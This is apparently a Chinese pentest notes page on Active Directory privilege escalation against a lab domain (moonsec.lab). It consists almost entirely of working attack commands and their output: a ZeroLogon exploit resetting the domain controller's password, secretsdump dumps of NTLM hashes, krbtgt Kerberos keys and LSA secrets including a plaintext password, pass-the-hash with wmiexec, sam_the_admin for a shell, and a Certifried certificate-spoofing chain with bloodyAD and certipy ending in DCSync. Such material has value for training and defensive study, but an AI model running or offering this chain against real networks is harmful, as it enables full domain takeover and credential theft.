Active Directory 域权限提升的几种方法

└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.15Performing authentication attempts...[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:135  ...  OK[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:49158  ...  OK=====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringResult: 0Exploit complete!

python3 secretsdump.py scaner/ad$@10.10.10.135 -no-passAdministrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::scaner.secdb:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::scaner.secmoonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::[*] Kerberos keys grabbedkrbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20dfkrbtgt:des-cbc-md5:91f2ab6198c1adf2scaner.secdb:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5scaner.secdb:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251scaner.secdb:des-cbc-md5:f2cd2c3bceae0dcdscaner.secmoonsec:aes256-cts-hmac-sha1-96:39054a2b86cb867177d23678dd40f2cfe89eaaa69f4a5e36725585cc0ad2faacscaner.secmoonsec:aes128-cts-hmac-sha1-96:fee3562d30d7a5556e87962382c828c6scaner.secmoonsec:des-cbc-md5:f1160b49cd8654e5AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948AD$:des-cbc-md5:e6fd2cae86c479fb12SERVER-DB$:aes256-cts-hmac-sha1-96:2caf760f94b8b8c25d33ae599748f5f9e8a9b7770dd79cde858276b4c22cb42312SERVER-DB$:aes128-cts-hmac-sha1-96:43aa58ec20e5067c32f81d7827e0d78612SERVER-DB$:des-cbc-md5:97cb313b2931c7c7

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCALImpacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68[*] DefaultPassword (Unknown User):ROOT#123[*] DPAPI_SYSTEM dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5[*] NL$KM  0000   AA C3 E0 AC C2 DA 1C 8A  E2 DB 90 CA 31 0B 7E 7A   ............1.~z 0010   6F 59 D2 1E BE 59 7D 65  25 B2 88 77 DE 20 C5 B2   oY...Y}e%..w. .. 0020   92 A6 4D 30 2D 1F 40 7D  64 2D 47 3B 92 C4 04 9D   ..M0-.@}d-G;.... 0030   EB DE 94 64 A6 7F 7F 5C  13 61 F4 C8 6E BA 0E B5   ...d....a..n...NL$KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5[*] Cleaning up... 

python sam_the_admin.py "moonsec/test:pass123" -dc-ip 10.10.10.135 -shell 

获取 ca certutil -config - -ping

生成证书certipy req 'moonsec.lab/test:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template User -debug测试证书certipy auth -pfx test.pfx -debug

查看ms-DS-MachineAccountQuota属性python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'DC=moonsec,DC=lab' ms-DS-MachineAccountQuota

使用bloodyAD工具来创建机器账户。python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135  addComputer sec123 pass123

如果ms-DS-MachineAccountQuota>0就可以创建机器帐户

更新机器帐户的DNS Host Name将机器帐户的DNS Host Name改为域控的ad.moonsec.labpython bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 setAttribute 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName '["ad.moonsec.lab"]'

查看DNSHostName的指向python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName

运行Certipy生成机器证书，可以看到DNS Host Name已经变成了ad.moonsec.lab
certipy req 'moonsec.lab/sec123$:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template Machine

验证证书 certipy auth -pfx ad.pfx -debug
impacket的secretsdump.py来dump哈希python secretsdump.py 'moonsec.lab/ad$@moonsec.lab' -hashes :76e0ba3e2c8333b929064f85dcc0a824